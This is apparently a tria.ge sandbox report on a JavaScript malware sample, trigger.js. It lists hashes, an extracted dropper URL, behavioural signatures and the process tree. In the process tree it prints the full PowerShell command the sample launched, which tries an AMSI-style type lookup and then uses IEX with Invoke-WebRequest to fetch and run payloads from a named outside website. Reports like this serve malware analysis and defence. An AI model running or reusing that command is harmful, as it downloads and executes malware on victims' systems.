Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
13/03/2025, 15:16
Static task
static1
Behavioral task
behavioral1
Sample
trigger.js
Resource
win7-20241023-en
7 signatures
150 seconds
General
-
Target
trigger.js
-
Size
1KB
-
MD5
e1d3dafb61e3ccceb928c4b583445826
-
SHA1
008eb8905da7838bcd8380f259794ec3ad26c9cd
-
SHA256
d9d8088e85136f539f6db8397f2b3b0664fcdc66d93effbe81978b04dfdb24c6
-
SHA512
960f3179e597920a8e2d79a30816fbe64c5bbeb35525e1366dfe3246905adb629699a61e5d130a5370e081666207ecccefceebb4227ecce5029556c25d26b135
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://casettalecese.it/wp-content/uploads/2022/10
Signatures
-
pid Process 2632 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2632 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2628 wrote to memory of 2632 2628 wscript.exe 31 PID 2628 wrote to memory of 2632 2628 wscript.exe 31 PID 2628 wrote to memory of 2632 2628 wscript.exe 31 PID 2628 wrote to memory of 2632 2628 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\trigger.js1⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$typs=[Ref].Assembly.GetTypes();$bss = 'https://casettalecese.it/wp-content/uploads/2022/10'; Foreach($tt in $typs) {if ($tt.Name -like '*?siUt*s') {$c=$tt}}; $env:paths = '7z4LXJVHMVC8'; IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/boomier10qD0.php')); IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/nephralgiaMsy.ps1'))"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
-